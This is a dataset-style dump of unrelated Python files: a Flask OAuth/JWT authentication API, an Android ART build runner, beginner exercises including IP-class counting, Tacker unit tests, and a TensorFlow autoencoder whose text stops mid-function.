def handleToolPower(self, player, results, tool, power):
if chance(self.chance):
results.power = 9999
def onRemove(self, owner):
if owner.isPlayer():
owner.event['tool_power'].remove(self.handleToolPower)
@staticmethod
def register():
game.effects.register(Precision.TUNING.NAME, Precision)
|
998,116 | 13ff5ad2c69dfe8bfc01aea24f67b73dbd222336 | ####### STANDARD/INSTALLED PACKAGES #######
from blogREST.common.utils import token_required
from flask import current_app, request, Flask, Blueprint, jsonify, redirect, url_for, session
from flask_restplus import Resource, Api, fields, Namespace
from flask_pymongo import PyMongo
from flask_dance.contrib.google import make_google_blueprint, google
import re
import jwt
import datetime
import hashlib
import bson
from bson.json_util import dumps
####### USER DEFINED PACKAGES #######
from blogREST.models.user import User
from blogREST.models.refresh import RefreshToken
from blogREST.models.api_model.user import get_user_model
from blogREST.common.utils import get_mongo_collection
api = Namespace(
'auth', description='Apis to authenticate and authorize users.')
userCollection = get_mongo_collection('User')
refreshTokenCollection = get_mongo_collection('RefreshToken')
# Api(auth_blueprint)
'''
API Models
'''
loginModel = api.model('Login', {
'username': fields.String(required=True),
'password': fields.String(required=True)
})
return_token_model = api.model('ReturnToken', {
'access_token': fields.String(required=True),
'refresh_token': fields.String(required=True)
})
'''
End of API Models
'''
@api.route('/oauth/login')
class googleLogin(Resource):
def get(self):
auth_blueprint = make_google_blueprint(
client_id=current_app.config['client_id'],
client_secret=current_app.config['client_secret'],
scope=[
"https://www.googleapis.com/auth/plus.me",
"https://www.googleapis.com/auth/userinfo.email",
"https://www.googleapis.com/auth/userinfo.profile"
]
)
if not google.authorized:
return redirect(url_for("google.login"))
resp = google.get("/oauth2/v2/userinfo")
assert resp.ok, resp.text
session['user_id'] = resp.json()["email"]
# return "You are {email} on Google".format(email=resp.json()["email"])
return resp.json()
@api.route('/oauth/logout')
class googleLogout(Resource):
def get(self):
auth_blueprint = make_google_blueprint(
client_id=current_app.config['client_id'],
client_secret=current_app.config['client_secret'],
scope=[
"https://www.googleapis.com/auth/plus.me",
"https://www.googleapis.com/auth/userinfo.email",
"https://www.googleapis.com/auth/userinfo.profile"
]
)
if not google.authorized:
return {'message': 'You are not logged in! To login go to /api/login'}
token = auth_blueprint.token["access_token"]
email = session["user_id"]
resp = google.post('https://accounts.google.com/o/oauth2/revoke',
params={'token': token},
headers={
'content-type': 'application/x-www-form-urlencoded'}
)
if resp.ok:
session.clear()
# logout_user()
message = f'User {email} is successfully logged out'
return {'message': message}
@api.route('/jwt/login')
class Log(Resource):
def refresTokenGenerator(self, user_id, refresh_token, user_agent_hash):
'''
the following method is called to generate a bson object to insert into
Refresh Token Collection.
'''
import collections # From Python standard library.
import bson
from bson.codec_options import CodecOptions
# refreshTokenJSON =
data = bson.BSON.encode({
"user_id": user_id,
"refresh_token": refresh_token,
"user_agent_hash": user_agent_hash
})
decoded_doc = bson.BSON.decode(data)
options = CodecOptions(document_class=collections.OrderedDict)
decoded_doc = bson.BSON.decode(data, codec_options=options)
return decoded_doc
@api.expect(loginModel)
@api.response(200, 'Success', return_token_model)
@api.response(401, 'Incorrect username or password')
def post(self):
"""
This API implements JWT. Token's payload contain:
'uid' (user id),
'exp' (expiration date of the token),
'iat' (the time the token is generated)
"""
user = userCollection.find_one({"username": api.payload['username']})
if not user:
api.abort(401, 'Incorrect username or password')
from blogREST.common.utils import check_password
if check_password(user['password'], api.payload['password']):
_access_token = jwt.encode({'uid': user['uid'],
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=15),
'iat': datetime.datetime.utcnow()},
current_app.config['SECRET_KEY']).decode('utf-8')
_refresh_token = jwt.encode({'uid': user['uid'],
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
'iat': datetime.datetime.utcnow()},
current_app.config['SECRET_KEY']).decode('utf-8')
user_agent_string = request.user_agent.string.encode('utf-8')
user_agent_hash = hashlib.md5(user_agent_string).hexdigest()
refresh_token = refreshTokenCollection.find_one(
{"user_agent_hash": user_agent_hash})
if not refresh_token:
refresh_token = self.refresTokenGenerator(user_id=user['uid'], refresh_token=_refresh_token,
user_agent_hash=user_agent_hash)
refreshTokenCollection.insert_one(refresh_token)
else:
refresh_token['refresh_token'] = _refresh_token
refreshTokenCollection.update(
{"user_agent_hash": user_agent_hash}, refresh_token, upsert=True)
return {'access_token': _access_token, 'refresh_token': _refresh_token}, 200
api.abort(401, 'Incorrect username or password')
@api.route('/jwt/refresh')
class Refresh(Resource):
@api.expect(api.model('RefreshToken', {'refresh_token': fields.String(required=True)}), validate=True)
@api.response(200, 'Success', return_token_model)
def post(self):
'''
Call this api to refresh the token.
'''
_refresh_token = api.payload['refresh_token']
try:
payload = jwt.decode(
_refresh_token, current_app.config['SECRET_KEY'])
refresh_token = refreshTokenCollection.find_one(
{"user_id": payload['uid'], "refresh_token": _refresh_token})
if not len(list(refresh_token)):
raise jwt.InvalidIssuerError
# Generate new pair
_access_token = jwt.encode({'uid': refresh_token['user_id'],
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=15),
'iat': datetime.datetime.utcnow()},
current_app.config['SECRET_KEY']).decode('utf-8')
_refresh_token = jwt.encode({'uid': refresh_token['user_id'],
'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=30),
'iat': datetime.datetime.utcnow()},
current_app.config['SECRET_KEY']).decode('utf-8')
refresh_token['refresh_token'] = _refresh_token
refreshTokenCollection.update(
{"user_id": payload['uid'], "refresh_token": _refresh_token}, refresh_token)
return {'access_token': _access_token, 'refresh_token': _refresh_token}, 200
except jwt.ExpiredSignatureError as e:
raise e
except (jwt.DecodeError, jwt.InvalidTokenError)as e:
raise e
except:
# print(e)
api.abort(401, 'Unknown token error')
# This resource only for test
@api.route('/protected', doc=False)
class Protected(Resource):
@token_required
def get(self, current_user):
return {'i am': 'protected', 'uid': current_user['uid']}
|
998,117 | 26be626185a0455e8c689e1622678bf526980d55 | #!/usr/bin/env python3
#
# Copyright 2017, The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build and run go/ab/git_master-art-host target
This script is executed by the android build server and must not be moved,
or changed in an otherwise backwards-incompatible manner.
Provided with a target name, the script setup the environment for
building the test target by taking config information from
from target_config.py.
See target_config.py for the configuration syntax.
"""
import argparse
import os
import pathlib
import subprocess
import sys
from target_config import target_config
import env
parser = argparse.ArgumentParser()
parser.add_argument('-j', default='1', dest='n_threads')
# either -l/--list OR build-target is required (but not both).
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('build_target', nargs='?')
group.add_argument('-l', '--list', action='store_true', help='List all possible run-build targets.')
options = parser.parse_args()
##########
if options.list:
print("List of all known build_target: ")
for k in sorted(target_config.keys()):
print(" * " + k)
# TODO: would be nice if this was the same order as the target config file.
sys.exit(1)
if not target_config.get(options.build_target):
sys.stderr.write("error: invalid build_target, see -l/--list.\n")
sys.exit(1)
target = target_config[options.build_target]
n_threads = options.n_threads
custom_env = target.get('env', {})
custom_env['SOONG_ALLOW_MISSING_DEPENDENCIES'] = 'true'
print(custom_env)
os.environ.update(custom_env)
# build is just a binary/script that is directly executed to build any artifacts needed for the
# test.
if 'build' in target:
build_command = target.get('build').format(
ANDROID_BUILD_TOP = env.ANDROID_BUILD_TOP,
MAKE_OPTIONS='DX= -j{threads}'.format(threads = n_threads))
sys.stdout.write(str(build_command) + '\n')
sys.stdout.flush()
if subprocess.call(build_command.split()):
sys.exit(1)
# make runs soong/kati to build the target listed in the entry.
if 'make' in target:
build_command = 'build/soong/soong_ui.bash --make-mode'
build_command += ' DX='
build_command += ' -j' + str(n_threads)
build_command += ' ' + target.get('make')
if env.DIST_DIR:
build_command += ' dist'
sys.stdout.write(str(build_command) + '\n')
sys.stdout.flush()
if subprocess.call(build_command.split()):
sys.exit(1)
if 'golem' in target:
machine_type = target.get('golem')
# use art-opt-cc by default since it mimics the default preopt config.
default_golem_config = 'art-opt-cc'
os.chdir(env.ANDROID_BUILD_TOP)
cmd = ['art/tools/golem/build-target.sh']
cmd += ['-j' + str(n_threads)]
cmd += ['--showcommands']
cmd += ['--machine-type=%s' %(machine_type)]
cmd += ['--golem=%s' %(default_golem_config)]
cmd += ['--tarball']
sys.stdout.write(str(cmd) + '\n')
sys.stdout.flush()
if subprocess.call(cmd):
sys.exit(1)
if 'run-test' in target:
run_test_command = [os.path.join(env.ANDROID_BUILD_TOP,
'art/test/testrunner/testrunner.py')]
test_flags = target.get('run-test', [])
out_dir = pathlib.PurePath(env.SOONG_OUT_DIR)
if not out_dir.is_absolute():
out_dir = pathlib.PurePath(env.ANDROID_BUILD_TOP).joinpath(out_dir)
run_test_command += list(map(lambda a: a.format(SOONG_OUT_DIR=str(out_dir)), test_flags))
# Let testrunner compute concurrency based on #cpus.
# b/65822340
# run_test_command += ['-j', str(n_threads)]
# In the config assume everything will run with --host and on ART.
# However for only [--jvm] this is undesirable, so don't pass in ART-specific flags.
if ['--jvm'] != test_flags:
run_test_command += ['--host']
run_test_command += ['--dex2oat-jobs']
run_test_command += ['4']
if '--no-build-dependencies' not in test_flags:
run_test_command += ['-b']
run_test_command += ['--verbose']
sys.stdout.write(str(run_test_command) + '\n')
sys.stdout.flush()
if subprocess.call(run_test_command):
sys.exit(1)
sys.exit(0)
|
998,118 | 7d10827a017d7090c10bdc89bbae4dbaeafe0efe | import math
d = int(input())
day = math.sqrt(d)
if day % 2 == 0:
print("OK")
else:
print("NG")
# 入力例1
# 256
# 出力例1
# OK
# 入力例2
# 255
# 出力例2
# NG |
998,119 | 3aa50d34a3689d9fbee1cf59b346fa054fa18b67 | print("Enter your name:")
name = input()
print("Enter your age:")
age = input()
print("You entered: " + name + " " + age)
|
998,120 | 54bdf9404be5096358c6ce413a2fda26c6c3df7d | '''
请解析IP地址和对应的掩码,进行分类识别。要求按照A/B/C/D/E类地址归类,不合法的地址和掩码单独归类。
所有的IP地址划分为 A,B,C,D,E五类
A类地址1.0.0.0~126.255.255.255;
B类地址128.0.0.0~191.255.255.255;
C类地址192.0.0.0~223.255.255.255;
D类地址224.0.0.0~239.255.255.255;
E类地址240.0.0.0~255.255.255.255
私网IP范围是:
10.0.0.0~10.255.255.255
172.16.0.0~172.31.255.255
192.168.0.0~192.168.255.255
子网掩码为二进制下前面是连续的1,然后全是0。(例如:255.255.255.32就是一个非法的掩码)
注意二进制下全是1或者全是0均为非法
注意:
1. 类似于【0.*.*.】和【127.*.*.】的IP地址不属于上述输入的任意一类,也不属于不合法ip地址,计数时可以忽略
2. 私有IP地址和A,B,C,D,E类地址是不冲突的
输入:
多行字符串。每行一个IP地址和掩码,用~隔开。
输出:
统计A、B、C、D、E、错误IP地址或错误掩码、私有IP的个数,之间以空格隔开。
'''
#code
'''
A、B、C、D、E、错误IP地址或错误掩码、私有IP的个数.
坑点1:IP和掩码要同时合法才能算记作正常的类别,如果有一个不合法则都归于不合法类
坑点2:掩码转换为二进制时要考虑不足8位的情况,需要补齐
坑点3:'0.x.x.x'和'127.x.x.x'也需要判断掩码是否正常,只是忽略了IP而已
坑点4:公网IP和私网IP不冲突,需要同时归属
'''
a,b,c,d,e,err,private_ip = 0,0,0,0,0,0,0
def err_ip(list):
for i in list:
if len(i)==0 or int(i) > 255 or int(i) < 0:
return True
def privateip(list):
if int(list[0]) == 10 and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return True
elif int(list[0]) == 172 and (int(list[1]) >=16 and int(list[1])<=31) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return True
elif int(list[0]) == 192 and int(list[1]) ==168 and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return True
else:
return False
def ipclass(list):
if (int(list[0]) >= 1 and int(list[0])<= 126) and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return 'A'
elif (int(list[0]) >= 128 and int(list[0])<=191) and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return 'B'
elif (int(list[0]) >= 192 and int(list[0])<=223) and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return 'C'
elif (int(list[0]) >= 224 and int(list[0])<=239) and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return 'D'
elif (int(list[0]) >= 240 and int(list[0])<=255) and (int(list[1]) >=0 and int(list[1])<=255) and (int(list[2]) >=0 and int(list[2])<=255) and (int(list[3]) >=0 and int(list[3])<=255):
return 'E'
def err_mask(list):
a = ''
b = 0
for i in list:
bin_value = bin(int(i,10))[2:]
if len(bin_value) < 8:
a = a + '0'*(8 - len(bin_value))+bin_value
else:
a = a + bin_value
for j in a.split('0')[1:]:
if j == '':
b = b + 0
else:
b = b + int(j)
if list == ['255','255','255','255'] or list == ['0','0','0','0'] or b > 0:
return True
else:
return False
while True:
try:
ip,mask = input().split('~')
ip_list = ip.split('.')
mask_list = mask.split('.')
#IP判断
if (ip_list[0] == '0' or ip_list[0] == '127') and err_mask(mask_list) == False: #特殊部分排除
pass
elif (ip_list[0] == '0' or ip_list[0] == '127') and err_mask(mask_list) == True:
err = err + 1
elif err_ip(ip_list) == True or err_mask(mask_list) == True: #错误判断
err = err + 1
else:
if ipclass(ip_list) == 'A':
a = a + 1
if ipclass(ip_list) == 'B':
b = b + 1
if ipclass(ip_list) == 'C':
c = c + 1
if ipclass(ip_list) == 'D':
d = d + 1
if ipclass(ip_list) == 'E':
e = e + 1
if privateip(ip_list) == True:
private_ip = private_ip + 1
except :
break
print(a,b,c,d,e,err,private_ip)
|
998,121 | 3057d997c71f44ba98e538f18aaa900730d8476f | # Copyright (c) 2019 NTT DATA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tacker.common import exceptions
from tacker import context
from tacker import objects
from tacker.tests.unit.db.base import SqlTestCase
from tacker.tests.unit.objects import fakes
from tacker.tests import uuidsentinel
class TestVnfSoftwareImages(SqlTestCase):
def setUp(self):
super(TestVnfSoftwareImages, self).setUp()
self.context = context.get_admin_context()
self.vnf_package = self._create_vnf_package()
self.vnf_deployment_flavour = self._create_vnf_deployment_flavour()
self.vnf_softwate_images = self._create_vnf_softwate_images()
def _create_vnf_package(self):
vnfpkgm = objects.VnfPackage(context=self.context,
**fakes.vnf_package_data)
vnfpkgm.create()
return vnfpkgm
def _create_vnf_deployment_flavour(self):
flavour_data = fakes.vnf_deployment_flavour
flavour_data.update({'package_uuid': self.vnf_package.id})
vnf_deployment_flavour = objects.VnfDeploymentFlavour(
context=self.context, **flavour_data)
vnf_deployment_flavour.create()
return vnf_deployment_flavour
def _create_vnf_softwate_images(self):
software_image = fakes.software_image
software_image.update(
{'flavour_uuid': self.vnf_deployment_flavour.id})
vnf_soft_image_obj = objects.VnfSoftwareImage(
context=self.context, **software_image)
vnf_soft_image_obj.create()
return vnf_soft_image_obj
def test_create(self):
software_image = fakes.software_image
software_image.update(
{'flavour_uuid': self.vnf_deployment_flavour.id})
vnf_soft_image_obj = objects.VnfSoftwareImage(
context=self.context, **software_image)
vnf_soft_image_obj.create()
self.assertTrue(vnf_soft_image_obj.id)
def test_software_image_create_with_id(self):
software_image = fakes.software_image
software_image.update({'id': uuidsentinel.id})
vnf_soft_image_obj = objects.VnfSoftwareImage(
context=self.context, **software_image)
self.assertRaises(
exceptions.ObjectActionError,
vnf_soft_image_obj.create)
def test_get_by_id(self):
vnf_software_images = objects.VnfSoftwareImage.get_by_id(
self.context, self.vnf_softwate_images.id, expected_attrs=None)
self.compare_obj(self.vnf_softwate_images, vnf_software_images)
def test_get_by_id_with_no_existing_id(self):
self.assertRaises(
exceptions.VnfSoftwareImageNotFound,
objects.VnfSoftwareImage.get_by_id, self.context,
uuidsentinel.invalid_uuid)
def test_attribute_with_valid_data(self):
data = {'id': self.vnf_softwate_images.id}
vnf_software_image_obj = objects.VnfSoftwareImage(
context=self.context, **data)
vnf_software_image_obj.obj_load_attr('name')
self.assertEqual('test', vnf_software_image_obj.name)
def test_invalid_attribute(self):
self.assertRaises(exceptions.ObjectActionError,
self.vnf_softwate_images.obj_load_attr, 'invalid')
def test_obj_load_attr_without_context(self):
data = {'id': self.vnf_softwate_images.id}
vnf_software_image_obj = objects.VnfSoftwareImage(**data)
self.assertRaises(exceptions.OrphanedObjectError,
vnf_software_image_obj.obj_load_attr, 'name')
def test_obj_load_attr_without_id_in_object(self):
data = {'name': self.vnf_softwate_images.name}
vnf_software_image_obj = objects.VnfSoftwareImage(
context=self.context, **data)
self.assertRaises(exceptions.ObjectActionError,
vnf_software_image_obj.obj_load_attr, 'name')
|
998,122 | abac2fa97a42f4b3040cf3904ee985c099017ed2 | """
内容:集合
data:2019.6.19
"""
# 1. 用{}括起来的,但是没有体现映射关系,集合中的元素是无序的,集合中的元素输出后都是唯一的
num1 = {}
print(num1)
num1 = {1,2,3,4,5}
print(num1)
set1 = {}
set2 = set([1,2,3,4,5,6]) # 用set()创建集合参数为列表
print(set1)
print(set2)
list1 = [1, 2, 3, 4, 4, 2, 7, 8, 9]
list1 = list(set([1, 2, 3, 4, 4, 2, 7, 8, 9]))
print(list1)
print(0 in list1)
# 4. 访问集合
set2 = {1, 3, 2, 4, 5, 9, 5, 7, 6, 8} # 集合中的元素是无序,如果元素是数字,输出时自动排序,如果有字符串,输出无序
for i in set2:
print(i, end=' ')
set3 = frozenset({1,2,3,4})
|
998,123 | 1f9e8df064adaf93d6d7fa21e9bd687c4854c573 | """
MIT License
Copyright (c) 2020-2021 Ecole Polytechnique.
@Author: Khaled Zaouk <khaled.zaouk@polytechnique.edu>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import tensorflow as tf
import numpy as np
from .saver import Saver
from sklearn.utils import shuffle
import os
from ..common.utils import weight_variable, bias_variable
from ..common.utils import train_test_split_, identity_tensor
import logging
import time
class FancyAutoEncoder:
def __init__(self, n_iter, hidden_layer_sizes, activations,
initial_learning_rate, solver='Adam', batch_size=32,
random_state=10, early_stopping=False, patience=10,
validation_set=None, lamda=1e-1, knob_cols=None,
auto_refit=True, max_refit_attempts=10):
"""
This is a modified version of the AutoEncoder imitating interfaces
provided by scikit-learn for unsupervised learning (fit, transform)
The main modification brought to this AutoEncoder is a new loss
function that focus on reconstructing another input. So such
an AutoEncoder will have 2 types of input:
1) It's traditional input which should be fed to the encoder layer
2) Another input which we try to approximate in the bottleneck layer.
lamda: coefficient multiplying the configuration approximation term
auto_refit: whether to autorefit if centroids are vanishing
max_refit_attempts: maximum number of attempts for refitting...
"""
if knob_cols is None:
# FIXME
pass
self.knob_cols = knob_cols
self.n_iter = n_iter
self.hidden_layer_sizes = hidden_layer_sizes
self.activations = activations
l = int(len(self.activations) / 2)
self.hidden_layer_sizes[int(
len(self.hidden_layer_sizes) / 2)] += len(self.knob_cols)
self.solver = solver
self.random_state = random_state
self.initial_learning_rate = initial_learning_rate
self._fitted = False
self.batch_size = batch_size
self.train_encodings = None
self.early_stopping = early_stopping
self.patience = patience
self.validation_set = validation_set
self.lamda = lamda #
self.centroids = None
# used to save encodings after mapping...
self.altered_centroids = None
self._last_fit_duration = None
# Number of times we're attempting to refit (because of vanishing \
# centroids)
self.refit_attempt = None
self.auto_refit = auto_refit # auto refit on failure
self.max_refit_attempts = max_refit_attempts
np.random.seed(random_state)
tf.set_random_seed(random_state)
try:
assert len(hidden_layer_sizes) % 2 == 1
self.__create_activation_map()
except AssertionError:
print("Error: the length of hidden_layer_sizes must be odd")
raise
def _compute_centroids(self, encodings, labels):
"""Computes the centroids of encodings given its labels...
! Note: centroids are indexed by job alias not by job id...
"""
counts = {}
centroids = {}
# Copy encodings to avoid ref modification when computing centroid.
encodings = encodings.copy()
for i, encoding in enumerate(encodings):
key = int(labels[i])
if key in centroids:
centroids[key] += encoding
counts[key] += 1
else:
centroids[key] = encoding
counts[key] = 1
for key in centroids:
centroids[key] /= counts[key]
self.centroids = centroids
def fake_fit(self, nn_weights):
self._architecture = self.__build_nn_architecture(
self.dim_Y, self.hidden_layer_sizes)
self._placeholders, self._weights, self._biases, \
self._outputs = self._architecture
encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
self._saver = Saver(
self._weights[:encoding_vector_index + 1] + self._biases)
self._saver.best_params = nn_weights
self._fitted = True
logging.warning(
"fake_fit has been called without calling restore_weights from saver")
def fit(self, X, debug=False,
centroids_strategy='all',
X_shared=None,
log_time=False,
refit_attempt=0):
"""
X: numpy array
contains the labels as first column then configuration columns
then observation columns
debug: boolean, default=False
centroid_strategy: str ('all' or 'shared')
'all' means compute the centroids from all given configurations
used for training the autoencoder
'shared' means compute the centroids from X_shared
X_shared: numpy array, default None
Only meaningful if centroid_strategy is 'shared'.
Same format as X
log_time: boolean, default=False
Whether or not to log the time to train the autoencoder.
refit_attempt: int
How many times we're attempting to refit again the autoencoder
because of vanishing centroids...
"""
self.refit_attempt = refit_attempt
if refit_attempt > 0:
logging.warn("Refitting autoencoder (attempt #: {})".format(
refit_attempt))
t0 = time.time()
labels = X[:, 0]
configurations = X[:, 1:1 + len(self.knob_cols)]
Y = X[:, 1 + len(self.knob_cols):]
YY = Y.copy()
early_stopping = self.early_stopping
patience = self.patience
validation_set = self.validation_set
if early_stopping:
config_train, config_val, Y_train, Y_val, labels_train, labels_val, _ = train_test_split_(
configurations, Y, labels, test_size=.1, shuffle=False)
else:
config_train = configurations
Y_train = Y
labels_train = labels
encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
if not self._fitted:
self.dim_Y = np.shape(Y_train)[1]
self._architecture = self.__build_nn_architecture(
self.dim_Y, self.hidden_layer_sizes)
self._placeholders, self._weights, self._biases, self._outputs = self._architecture
self._saver = Saver(
self._weights[:encoding_vector_index + 1] + self._biases)
self._fitted = True
out = self._outputs[-1]
encoded_value = self._outputs[encoding_vector_index]
config_approx = encoded_value[:, -len(self.knob_cols):]
encoded_value = encoded_value[:, :-len(self.knob_cols)]
config = self._placeholders[0]
Y = self._placeholders[-1]
mse_err = tf.reduce_mean(tf.square(Y - out))
config_recons_mse = tf.reduce_mean(tf.square(config - config_approx))
err = mse_err + self.lamda * config_recons_mse
if self.lamda < 1e-9:
err = mse_err
elif self.lamda > 1e9:
err = config_recons_mse
train_step = tf.train.AdamOptimizer(
self.initial_learning_rate).minimize(err)
n_train = np.shape(Y_train)[0]
self.history = {}
self.history['loss'] = []
self.history['val_loss'] = []
self.log = {}
self.log['obs_val_val'] = []
self.log['config_recons_val'] = []
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
min_err = np.inf
best_epoch = -1
count = 0
n_epochs = self.n_iter
exited_early_stopping = False
if debug:
first_term_initial = mse_err.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
second_term_initial = config_recons_mse.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
for e in range(n_epochs):
if early_stopping and best_epoch > 0 and e > best_epoch + patience:
exited_early_stopping = True
break
stop = 0
config_shuf, Y_shuf = shuffle(
config_train, Y_train, random_state=self.random_state)
n_train = len(Y_train)
r1 = range(int(np.ceil(n_train / self.batch_size)))
for i in r1:
Y_batch = Y_shuf[i *
self.batch_size:(i + 1) * self.batch_size, :]
config_batch = config_shuf[i *
self.batch_size:(i + 1) * self.batch_size, :]
train_step.run(feed_dict=self.__get_feed_dict(
config_batch, Y_batch, self._placeholders))
loss = err.eval(feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
self.history['loss'].append(loss)
if debug:
mse_err_value = mse_err.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
config_recons_err_value = config_recons_mse.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
if early_stopping:
val_loss = err.eval(
feed_dict=self.__get_feed_dict(
config_val, Y_val, self._placeholders))
self.history['val_loss'].append(val_loss)
if debug:
mse_err_value_ = mse_err.eval(
feed_dict=self.__get_feed_dict(
config_val, Y_val, self._placeholders))
config_recons_err_value_ = config_recons_mse.eval(
feed_dict=self.__get_feed_dict(
config_val, Y_val, self._placeholders))
self.log['obs_val_val'].append(mse_err_value_)
self.log['config_recons_val'].append(
config_recons_err_value_)
if val_loss < min_err:
self._saver.save_weights(sess)
min_err = val_loss
count += 1
best_epoch = e
if early_stopping and exited_early_stopping:
self._saver.restore_weights(sess)
else:
best_epoch = -1
self._saver.save_weights(sess)
if debug:
first_term_final = mse_err.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
second_term_final = config_recons_mse.eval(
feed_dict=self.__get_feed_dict(
config_train, Y_train, self._placeholders))
self.optim_log = [
first_term_initial, second_term_initial, first_term_final,
second_term_final]
encoded_vals = encoded_value.eval(
session=sess, feed_dict=self.__get_feed_dict(
configurations, YY, self._placeholders))
if centroids_strategy == 'all':
self._compute_centroids(encoded_vals, labels)
elif centroids_strategy == 'shared':
assert X_shared is not None
labels_shared = X_shared[:, 0]
configurations_shared = X_shared[:, 1:1 + len(self.knob_cols)]
Y_shared = X_shared[:, 1 + len(self.knob_cols):]
encoded_vals_shared = encoded_value.eval(
session=sess, feed_dict=self.__get_feed_dict(
configurations_shared, Y_shared, self._placeholders))
self._compute_centroids(encoded_vals_shared, labels_shared)
else:
raise NotImplementedError
count_zeros = 0
for key in self.centroids:
if np.sum(np.abs(self.centroids[key])) < 1e-10:
count_zeros += 1
if count_zeros > 1 and self.auto_refit and(
refit_attempt + 1) < self.max_refit_attempts:
self._fitted = False
return self.fit(
X, debug=debug, centroids_strategy=centroids_strategy,
X_shared=X_shared, log_time=log_time,
refit_attempt=refit_attempt + 1)
elif count_zeros > 1 and self.auto_refit:
logging.warn("Attempted to refit the autoencoder {} times with vanishing centroids...".format(
self.max_refit_attempts))
t_end = time.time()
fitting_time = t_end - t0
self._last_fit_duration = fitting_time
if log_time:
logging.info(
"[AE fitting time]: {} minutes and {} seconds".format(
fitting_time // 60,
int(fitting_time % 60)))
if debug:
return encoded_vals, best_epoch
return encoded_vals
def transform(self, X):
configs = X[:, 1:1 + len(self.knob_cols)]
if np.ndim(X) > 1:
Y = X[:, 1 + len(self.knob_cols):]
else:
aux = np.shape(X[1 + len(self.knob_cols):])[0]
Y = np.reshape(X[1 + len(self.knob_cols):], [1, aux])
try:
assert self._fitted == True
encoding_vector_index = int(len(self.hidden_layer_sizes) / 2)
out = self._outputs[-1]
encoded_value = self._outputs[encoding_vector_index][
:, : -len(self.knob_cols)]
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
self._saver.restore_weights(sess)
dico = self.__get_feed_dict(configs, Y, self._placeholders)
encodings = encoded_value.eval(session=sess, feed_dict=dico)
# print(np.shape(encodings))
except AssertionError:
print("Error: needs to call fit before transform can be invoked")
raise
return encodings
def __create_activation_map(self):
self._activ_func = {}
self._activ_func['relu'] = tf.nn.relu
self._activ_func['sigmoid'] = tf.nn.sigmoid
self._activ_func['tanh'] = tf.nn.tanh
self._activ_func[None] = identity_tensor
self._activ_func[''] = identity_tensor
self._activ_func['linear'] = identity_tensor
def __get_feed_dict(self, config, Y, placeholders):
config_pl = placeholders[0]
Y_true = placeholders[-1]
feed_dict = {config_pl: config, Y_true: Y}
return feed_dict
def __make_fc_layers(
self, Y, dim_Y, hidden_dimensions, activations, trainable):
"""
Creates the weights, biases and outputs of the autoencoder with
tied weights option.
"""
size = len(hidden_dimensions)
encoding_vector_index = int(len(hidden_dimensions) / 2)
dimensions = hidden_dimensions + [dim_Y]
activations = activations.copy()
for i in range(len(activations)):
activations[i] = self._activ_func[activations[i]]
weights = []
biases = []
outputs = []
for i in range(len(dimensions)):
if i == 0:
r = 4 * np.sqrt(6 / (dim_Y + dimensions[i]))
Wi = weight_variable(
[dim_Y, dimensions[i]],
trainable=trainable[i],
init_std=0.1)
bi = bias_variable(
[dimensions[i]], trainable=trainable[i], init=0.1)
oi = tf.matmul(Y, Wi) + bi
